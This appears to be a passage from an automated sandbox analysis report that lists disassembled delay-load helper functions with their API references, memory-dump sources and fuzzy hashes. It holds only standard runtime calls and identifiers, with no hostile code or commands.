                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 23f970125a6774b2457c13c8047251c956cb7fb5258b98c7c8631ff99efb79bd
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 23f970125a6774b2457c13c8047251c956cb7fb5258b98c7c8631ff99efb79bd
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: fd8ffc18164d65eae8a77822cb5e4b353c753491cb1e91ed23d4f9be444bed39
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: fd8ffc18164d65eae8a77822cb5e4b353c753491cb1e91ed23d4f9be444bed39
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 292e6da1cc5c6db22178ff9e2e16c40028e36c58f49e05733f10eedc72e199cd
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 292e6da1cc5c6db22178ff9e2e16c40028e36c58f49e05733f10eedc72e199cd
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 147dcfcbc8fad536e13008aea3c4023b63337bf97ab11056e8b536a8c9d83167
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 147dcfcbc8fad536e13008aea3c4023b63337bf97ab11056e8b536a8c9d83167
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 8c2e5421515c39cd7c4af4ade0e61756c1029751402db14f3c35bb25268e41af
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 8c2e5421515c39cd7c4af4ade0e61756c1029751402db14f3c35bb25268e41af
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 04988bf0ac7e501ed366c7dac0bd678c2017f7e64f3b2813ad80282422188e21
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 04988bf0ac7e501ed366c7dac0bd678c2017f7e64f3b2813ad80282422188e21
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 96f3e84dbc6d3967735b2029dc05de2a20944d71702e3dc54dd9a1b8395150f5
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 96f3e84dbc6d3967735b2029dc05de2a20944d71702e3dc54dd9a1b8395150f5
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            Function 00A4E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 5a2242482ab769626f2214bc880ede8eb2c0885cdd6f5355c6a7cbff2bebcc3c
                                                                                            • Instruction ID: 8424fbc7cc530afbc2fff16140771837df33426fae634f152a3dabfe8bf3e303
                                                                                            • Opcode Fuzzy Hash: 5a2242482ab769626f2214bc880ede8eb2c0885cdd6f5355c6a7cbff2bebcc3c
                                                                                            • Instruction Fuzzy Hash: 80A001FE2A95527D7509EA51AE06C3B022DE4C1B25330A92EF866A9481AC8028451976
                                                                                            Function 00A4E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: a61fcb3c5cab9d7f2e054e76bdded14f58c2e84c674a9b072fe886000468aa3b
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: a61fcb3c5cab9d7f2e054e76bdded14f58c2e84c674a9b072fe886000468aa3b
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            Function 00A4E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: f440f2b7712c00c6b8113a34535a74d25ef8f887cf476731cdc97af040f92822
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: f440f2b7712c00c6b8113a34535a74d25ef8f887cf476731cdc97af040f92822
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            Function 00A4E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 2e83e69f484ddf1db4dffd34a76f0df3c4c766b5a091a3e507e948bae5a2fd24
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: 2e83e69f484ddf1db4dffd34a76f0df3c4c766b5a091a3e507e948bae5a2fd24
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            Function 00A4E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 0b61b5817652119362f8b5181e867c7cc687034dcb8103d514420ff8b87648d3
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: 0b61b5817652119362f8b5181e867c7cc687034dcb8103d514420ff8b87648d3
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            Function 00A4E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 5b3f2243a5fdf33d36743bf67babbf5af98ce0cb96d6494f990f985cbcb25c99
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: 5b3f2243a5fdf33d36743bf67babbf5af98ce0cb96d6494f990f985cbcb25c99
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            Function 00A4E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 4944013ea54ed9e156c06fff26d35c5ae053e5c9153e1105d2eaa9ea1978e0dd
                                                                                            • Instruction ID: 4c2e31887aaa4e1e194232543c802cf9197acf308eea37306977886ea74cdba9
                                                                                            • Opcode Fuzzy Hash: 4944013ea54ed9e156c06fff26d35c5ae053e5c9153e1105d2eaa9ea1978e0dd
                                                                                            • Instruction Fuzzy Hash: 0EA011EE2AA002BC3008A2A0AE02C3B022CE0C0B20330AA2EF80280080A88008000832
                                                                                            Function 00A4E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
